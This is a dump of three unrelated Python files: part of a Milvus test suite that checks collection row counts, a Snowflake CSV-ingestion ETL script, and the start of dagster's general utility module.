expected: the count is equal to the length of vectors
'''
new_tag = "new_tag"
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
status = connect.create_partition(collection, tag)
status = connect.create_partition(collection, new_tag)
assert status.OK()
res = connect.add_vectors(collection_name=collection, records=vectors, partition_tag=tag)
connect.flush([collection])
status, res = connect.count_collection(collection)
assert res == nb
def test_collection_rows_count_multi_partitions_C(self, connect, collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection, create partitions and add vectors in one of the partitions,
assert the value returned by count_collection method is equal to length of vectors
expected: the collection count is equal to the length of vectors
'''
new_tag = "new_tag"
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
status = connect.create_partition(collection, tag)
status = connect.create_partition(collection, new_tag)
assert status.OK()
res = connect.add_vectors(collection_name=collection, records=vectors, partition_tag=tag)
res = connect.add_vectors(collection_name=collection, records=vectors, partition_tag=new_tag)
connect.flush([collection])
status, res = connect.count_collection(collection)
assert res == nb * 2
def test_collection_rows_count_after_index_created(self, connect, collection, get_simple_index):
'''
target: test count_collection, after index have been created
method: add vectors in db, and create index, then calling count_collection with correct params
expected: count_collection raise exception
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
nb = 100
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(collection_name=collection, records=vectors)
connect.flush([collection])
connect.create_index(collection, index_type, index_param)
status, res = connect.count_collection(collection)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, collection, dis_connect):
'''
target: test count_collection, without connection
method: calling count_collection with correct params, with a disconnected instance
expected: count_collection raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.count_collection(collection)
def test_collection_rows_count_no_vectors(self, connect, collection):
'''
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_collection method is equal to 0
expected: the count is equal to 0
'''
collection_name = gen_unique_str()
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_collection(param)
status, res = connect.count_collection(collection)
assert res == 0
# TODO: enable
@pytest.mark.level(2)
@pytest.mark.timeout(20)
def _test_collection_rows_count_multiprocessing(self, connect, collection, args):
'''
target: test collection rows_count is correct or not with multiprocess
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 2
uri = "tcp://%s:%s" % (args["ip"], args["port"])
vectors = gen_vectors(nq, dim)
res = connect.add_vectors(collection_name=collection, records=vectors)
time.sleep(add_time_interval)
def rows_count(milvus):
status, res = milvus.count_collection(collection)
logging.getLogger().info(status)
assert res == nq
process_num = 8
processes = []
for i in range(process_num):
milvus = get_milvus(args["handler"])
milvus.connect(uri=uri)
p = Process(target=rows_count, args=(milvus, ))
processes.append(p)
p.start()
logging.getLogger().info(p)
for p in processes:
p.join()
def test_collection_rows_count_multi_collections(self, connect):
'''
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(20):
collection_name = gen_unique_str()
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
res = connect.add_vectors(collection_name=collection_name, records=vectors)
connect.flush(collection_list)
for i in range(20):
status, res = connect.count_collection(collection_list[i])
assert status.OK()
assert res == nq
class TestCollectionCountIP:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_collection_rows_count(self, connect, ip_collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(collection_name=ip_collection, records=vectors)
connect.flush([ip_collection])
status, res = connect.count_collection(ip_collection)
assert res == nb
def test_collection_rows_count_after_index_created(self, connect, ip_collection, get_simple_index):
'''
target: test count_collection, after index have been created
method: add vectors in db, and create index, then calling count_collection with correct params
expected: count_collection raise exception
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
nb = 100
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(collection_name=ip_collection, records=vectors)
connect.flush([ip_collection])
connect.create_index(ip_collection, index_type, index_param)
status, res = connect.count_collection(ip_collection)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, ip_collection, dis_connect):
'''
target: test count_collection, without connection
method: calling count_collection with correct params, with a disconnected instance
expected: count_collection raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.count_collection(ip_collection)
def test_collection_rows_count_no_vectors(self, connect, ip_collection):
'''
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_collection method is equal to 0
expected: the count is equal to 0
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_collection(param)
status, res = connect.count_collection(ip_collection)
assert res == 0
# TODO: enable
@pytest.mark.timeout(60)
def _test_collection_rows_count_multiprocessing(self, connect, ip_collection, args):
'''
target: test collection rows_count is correct or not with multiprocess
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 2
uri = "tcp://%s:%s" % (args["ip"], args["port"])
vectors = gen_vectors(nq, dim)
res = connect.add_vectors(collection_name=ip_collection, records=vectors)
time.sleep(add_time_interval)
def rows_count(milvus):
status, res = milvus.count_collection(ip_collection)
logging.getLogger().info(status)
assert res == nq
process_num = 8
processes = []
for i in range(process_num):
milvus = get_milvus(args["handler"])
milvus.connect(uri=uri)
p = Process(target=rows_count, args=(milvus,))
processes.append(p)
p.start()
logging.getLogger().info(p)
for p in processes:
p.join()
def test_collection_rows_count_multi_collections(self, connect):
'''
target: test collection rows_count is correct or not with multiple collections of IP
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(20):
collection_name = gen_unique_str('test_collection_rows_count_multi_collections')
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
res = connect.add_vectors(collection_name=collection_name, records=vectors)
connect.flush(collection_list)
for i in range(20):
status, res = connect.count_collection(collection_list[i])
assert status.OK()
assert res == nq
class TestCollectionCountJAC:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
def test_collection_rows_count(self, connect, jac_collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=jac_collection, records=vectors)
connect.flush([jac_collection])
status, res = connect.count_collection(jac_collection)
assert res == nb
def test_collection_rows_count_after_index_created(self, connect, jac_collection, get_jaccard_index):
'''
target: test count_collection, after index have been created
method: add vectors in db, and create index, then calling count_collection with correct params
expected: count_collection raise exception
'''
nb = 100
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=jac_collection, records=vectors)
connect.flush([jac_collection])
connect.create_index(jac_collection, index_type, index_param)
status, res = connect.count_collection(jac_collection)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, jac_collection, dis_connect):
'''
target: test count_collection, without connection
method: calling count_collection with correct params, with a disconnected instance
expected: count_collection raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.count_collection(jac_collection)
def test_collection_rows_count_no_vectors(self, connect, jac_collection):
'''
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_collection method is equal to 0
expected: the count is equal to 0
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_collection(param)
status, res = connect.count_collection(jac_collection)
assert res == 0
def test_collection_rows_count_multi_collections(self, connect):
'''
target: test collection rows_count is correct or not with multiple collections of IP
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
tmp, vectors = gen_binary_vectors(nq, dim)
collection_list = []
for i in range(20):
collection_name = gen_unique_str('test_collection_rows_count_multi_collections')
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
res = connect.add_vectors(collection_name=collection_name, records=vectors)
connect.flush(collection_list)
for i in range(20):
status, res = connect.count_collection(collection_list[i])
assert status.OK()
assert res == nq
class TestCollectionCountBinary:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
def test_collection_rows_count(self, connect, ham_collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=ham_collection, records=vectors)
connect.flush([ham_collection])
status, res = connect.count_collection(ham_collection)
assert res == nb
def test_collection_rows_count_substructure(self, connect, substructure_collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=substructure_collection, records=vectors)
connect.flush([substructure_collection])
status, res = connect.count_collection(substructure_collection)
assert res == nb
def test_collection_rows_count_superstructure(self, connect, superstructure_collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=superstructure_collection, records=vectors)
connect.flush([superstructure_collection])
status, res = connect.count_collection(superstructure_collection)
assert res == nb
def test_collection_rows_count_after_index_created(self, connect, ham_collection, get_hamming_index):
'''
target: test count_collection, after index have been created
method: add vectors in db, and create index, then calling count_collection with correct params
expected: count_collection raise exception
'''
nb = 100
index_type = get_hamming_index["index_type"]
index_param = get_hamming_index["index_param"]
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=ham_collection, records=vectors)
connect.flush([ham_collection])
connect.create_index(ham_collection, index_type, index_param)
status, res = connect.count_collection(ham_collection)
assert res == nb
def test_collection_rows_count_after_index_created_substructure(self, connect, substructure_collection, get_substructure_index):
'''
target: test count_collection, after index have been created
method: add vectors in db, and create index, then calling count_collection with correct params
expected: count_collection raise exception
'''
nb = 100
index_type = get_substructure_index["index_type"]
index_param = get_substructure_index["index_param"]
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=substructure_collection, records=vectors)
connect.flush([substructure_collection])
connect.create_index(substructure_collection, index_type, index_param)
status, res = connect.count_collection(substructure_collection)
assert res == nb
def test_collection_rows_count_after_index_created_superstructure(self, connect, superstructure_collection, get_superstructure_index):
'''
target: test count_collection, after index have been created
method: add vectors in db, and create index, then calling count_collection with correct params
expected: count_collection raise exception
'''
nb = 100
index_type = get_superstructure_index["index_type"]
index_param = get_superstructure_index["index_param"]
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=superstructure_collection, records=vectors)
connect.flush([superstructure_collection])
connect.create_index(superstructure_collection, index_type, index_param)
status, res = connect.count_collection(superstructure_collection)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, ham_collection, dis_connect):
'''
target: test count_collection, without connection
method: calling count_collection with correct params, with a disconnected instance
expected: count_collection raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.count_collection(ham_collection)
def test_collection_rows_count_no_vectors(self, connect, ham_collection):
'''
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_collection method is equal to 0
expected: the count is equal to 0
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_collection(param)
status, res = connect.count_collection(ham_collection)
assert res == 0
def test_collection_rows_count_multi_collections(self, connect):
'''
target: test collection rows_count is correct or not with multiple collections of IP
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
tmp, vectors = gen_binary_vectors(nq, dim)
collection_list = []
for i in range(20):
collection_name = gen_unique_str('test_collection_rows_count_multi_collections')
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
res = connect.add_vectors(collection_name=collection_name, records=vectors)
connect.flush(collection_list)
for i in range(20):
status, res = connect.count_collection(collection_list[i])
assert status.OK()
assert res == nq
class TestCollectionCountTANIMOTO:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_tanimoto_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
def test_collection_rows_count(self, connect, tanimoto_collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=tanimoto_collection, records=vectors)
connect.flush([tanimoto_collection])
status, res = connect.count_collection(tanimoto_collection)
assert status.OK()
assert res == nb
|
main.py | from time import sleep
import ingestion
import snowflake.connector
import os
import json
from ddlgenerator.ddlgenerator import Table
import re
import multiprocessing
environmentVariables='config/envVar.json'
ev={"controlTable":"","cur":""}
def executeMultiQuery(queries):
cur=ev["cur"]
dbObjCur=cur
for i in queries:
dbObjCur.execute(i)
print(dbObjCur.fetchall())
return dbObjCur.fetchone()
def get_ddl(fileSourceLocation,fileName,targetDb,targetSchema,targetTable):
menu = Table(str(fileSourceLocation)+"/"+str(fileName),table_name=targetTable)
ddl = menu.ddl('mysql')
ddl = ddl.replace("CREATE TABLE ", "CREATE OR REPLACE TABLE "+str(targetDb)+"."+str(targetSchema)+".")
ddl = ddl.replace(";","")
# .replace("___","").replace("__","")
# ddl = ddl.replace("DROP TABLE "+str(fileName),"")
ddl=re.sub('.*', '', ddl, 3)
# print(re.sub('^DROP TABLE .*$', '', ddl))
ddl=(re.sub(r"\t+_*", '', ddl))
print(ddl)
return(str(ddl))
def FullDirectFile(jobVariables):
fileSourceType = jobVariables['FILE_SRC_TYPE']
fileSourceLocation = jobVariables['SRC_LOC']
fileName = jobVariables['SRC_TBL_NAME']
stageName = jobVariables['STAGE']
targetTable = str(jobVariables['TGT_TBL'])
targetSchema = jobVariables['TGT_SCHEMA']
targetDb = jobVariables['TGT_DB']
fileFormat = jobVariables['FILE_FORMAT']
fileOptions = jobVariables['FILE_OPTIONS']
truncateFlag= jobVariables['TARGET_TRUNCATE_FLAG']
recreateDdl=jobVariables['RECREATE_DDL']
fileFormatDb=jobVariables['FILE_FORMAT_DB']
fileFormatSchema=jobVariables['FILE_FORMAT_SCHEMA']
# menu = Table(str(fileSourceLocation)+"/"+str(fileName),table_name=targetTable)
# ddl = menu.ddl('mysql')
# ddl = ddl.replace("CREATE TABLE ", "CREATE TABLE IF NOT EXISTS "+str(targetDb)+"."+str(targetSchema)+".")
# ddl = ddl.replace(";","")
# # ddl = ddl.replace("DROP TABLE "+str(fileName),"")
# ddl=re.sub('.*', '', ddl, 3)
# # print(re.sub('^DROP TABLE .*$', '', ddl))
queries=[]
if(recreateDdl=='Y'):
ddl= get_ddl(fileSourceLocation,fileName,targetDb,targetSchema,targetTable)
queries.append(ddl)
elif(truncateFlag=='Y'):
truncateQuery="TRUNCATE TABLE "+targetDb+"."+targetSchema+"."+targetTable
queries.append(truncateQuery)
if(fileSourceType=='Local'):
putCommand="PUT 'file://"+str(fileSourceLocation)+"/"+str(fileName)+"' @"+stageName
copyCommand="COPY INTO "+targetDb+"."+targetSchema+"."+targetTable+" FROM '@"+stageName+"/"+fileName+".gz' FILE_FORMAT="+fileFormatDb+"."+fileFormatSchema+"."+fileFormat+" "+fileOptions
queries.append(putCommand)
queries.append(copyCommand)
print(queries)
executeMultiQuery(queries)
def readControlTable(CONTROL_TABLE,batch):
import csv
file = open(CONTROL_TABLE)
csvreader = csv.DictReader(file)
# print(header)
rows = []
for row in csvreader:
# print(row['BATCH_NAME'])
if((row['BATCH_NAME']==batch) & (row['JOB_ACTIVE_FLAG'] =='Y')):
rows.append(row)
# print(rows)
file.close()
return rows
def gridIterator(gridVariable,func):
# num_cores = multiprocessing.cpu_count()
# results = Parallel(n_jobs=num_cores)(delayed(func)(jobVariable) for jobVariable in gridVariable)
# jobs=[]
# for jobVariable in gridVariable:
# process = multiprocessing.Process(target=func,args=(jobVariable))
# jobs.append(process)
# for j in jobs:
# j.start()
# for j in jobs:
# j.join()
jobs = []
for batch in gridVariable:
# print(batch)
process = multiprocessing.Process(
target=func,
args=(batch,)
)
jobs.append(process)
for j in jobs:
j.start()
for j in jobs:
j.join()
# for jobVariable in gridVariable:
# func(jobVariable)
# try:
# func(jobVariable,cur)
# continue
# except:
# print("an error occured")
# continue
return 0
def initEnv(env,environmentVariables):
f = open(environmentVariables)
envVar = json.load(f)
ev["controlTable"]=str(envVar[env]["CONTROL_TABLE"])
wh="USE WAREHOUSE "+str(envVar[env]["DEFAULT_WH"])
dbSch="USE "+str(envVar[env]["DEFAULT_DB"])+"."+str(envVar[env]["DEFAULT_SCHEMA"])
queries=['SELECT current_version()',wh,dbSch]
sfSrc=ingestion.dbConnect(str(envVar[env]["CONFIG_FILE"]),str(envVar[env]["TGT_CON_NAME"]),logging=True,debug=False)
cur=sfSrc.dbCursor
ev["cur"]=cur
executeMultiQuery(queries)
return cur
def mjEdlIngest(batch):
gridVariable=readControlTable(ev["controlTable"],batch)
# for i in gridVariable:
# print(i["JOB_NAME"])
gridIterator(gridVariable,FullDirectFile)
import multiprocessing
# batch='EVERY_MINUTE3'
# global cur
initEnv('APISERO',environmentVariables)
if __name__ == "__main__":
# initEnv('DEV_AZURE_WEST',environmentVariables)
# mjEdlIngest(batch)
pass
# while True:
# mjEdlIngest(batch,cur)
# sleep(50)
# mjEdlIngest(batch)
# gridIterator(gridVariable,FullDirectFile,sfSrc.dbCursor)
# FullDirectFile(fileSourceType,fileSourceLocation,fileName,stageName,targetTable,targetSchema,targetDb,fileFormat,fileOptions,sfSrc.dbCursor,'Y')
# sfSrc.dbCursor.execute("PUT 'file://D:/Workspace/Software Development/akash-adhikary/Projects/ETL/ETL-Ingestion-Framework/test_file.csv' @OYO.USERS.CONTACTS")
# sfSrc.dbCursor.execute("copy into employee from '@contacts/test_file.csv.gz' file_format=DEMO_CONTACTS_CSV PURGE=TRUE")
# print(sfSrc.dbCursor.fetchall())
|
__init__.py | import contextlib
import datetime
import errno
import functools
import inspect
import os
import re
import signal
import socket
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import six
import yaml
from six.moves import configparser
from dagster import check, seven
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, TemporaryDirectory, multiprocessing, thread
from dagster.seven.abc import Mapping
from dagster.utils.merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
# 2/3 compatibility
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = "repository.yaml"
DEFAULT_WORKSPACE_YAML_FILENAME = "workspace.yaml"
def file_relative_path(dunderfile, relative_path):
"""
This function is useful when one needs to load a file that is
relative to the position of the current file. (Such as when
you encode a configuration file path in source file and want
in runnable in any current working directory)
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
"""
check.str_param(dunderfile, "dunderfile")
check.str_param(relative_path, "relative_path")
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
"""
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
of that file. Otherwise it will be relative to script that
ran the test
Note: this is function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
"""
# from http://bit.ly/2snyC6s
check.str_param(file_path, "file_path")
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, "string")
string = re.sub(r"^[\-_\.]", "", str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r"[\-_\.\s]([a-z])", lambda matched: str(matched.group(1)).upper(), string[1:]
)
def ensure_single_item(ddict):
check.dict_param(ddict, "ddict")
check.param_invariant(len(ddict) == 1, "ddict", "Expected dict with single item")
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
""""Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
"""
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output([sys.executable, path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
from dagster.core.test_utils import instance_for_test
with instance_for_test():
cli_cmd = [
sys.executable,
"-m",
"dagster",
"pipeline",
"execute",
"-f",
path,
"-a",
pipeline_fn_name,
]
if env_file:
cli_cmd.append("-c")
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe) # pylint: disable=print-call
raise cpe
def safe_tempfile_path_unmanaged():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
return Path(path).as_posix()
@contextlib.contextmanager
def safe_tempfile_path():
try:
path = safe_tempfile_path_unmanaged()
yield path
finally:
if os.path.exists(path):
os.unlink(path)
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, "a"):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
# This will raise a KeyboardInterrupt in python land - meaning this wont be able to
# interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(termination_event, "termination_event", ttype=type(multiprocessing.Event()))
int_thread = threading.Thread(
target=_kill_on_event, args=(termination_event,), name="kill-on-event"
)
int_thread.daemon = True
int_thread.start()
# Wraps code that we don't want a SIGINT to interrupt (but throw a KeyboardInterrupt if a
# SIGINT was received while it ran)
@contextlib.contextmanager
def delay_interrupts():
if not seven.is_main_thread():
yield
else:
original_signal_handler = signal.getsignal(signal.SIGINT)
received_interrupt = {"received": False}
def _new_signal_handler(signo, _):
check.invariant(signo == signal.SIGINT)
received_interrupt["received"] = True
signal.signal(signal.SIGINT, _new_signal_handler)
try:
yield
finally:
signal.signal(signal.SIGINT, original_signal_handler)
if received_interrupt["received"]:
raise KeyboardInterrupt
def datetime_as_float(dt):
check.inst_param(dt, "dt", datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, "self", key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, "new_tags", key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
class EventGenerationManager(object):
""" Utility class that wraps an event generator function, that also yields a single instance of
a typed object. All events yielded before the typed object are yielded through the method
`generate_setup_events` and all events yielded after the typed object are yielded through the
method `generate_teardown_events`.
This is used to help replace the context managers used in pipeline initialization with
generators so that we can begin emitting initialization events AND construct a pipeline context
object, while managing explicit setup/teardown.
This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
get the typed object.
"""
def __init__(self, generator, object_cls, require_object=True):
self.generator = check.generator(generator)
self.object_cls = check.type_param(object_cls, "object_cls")
self.require_object = check.bool_param(require_object, "require_object")
self.object = None
self.did_setup = False
self.did_teardown = False
def generate_setup_events(self):
self.did_setup = True
try:
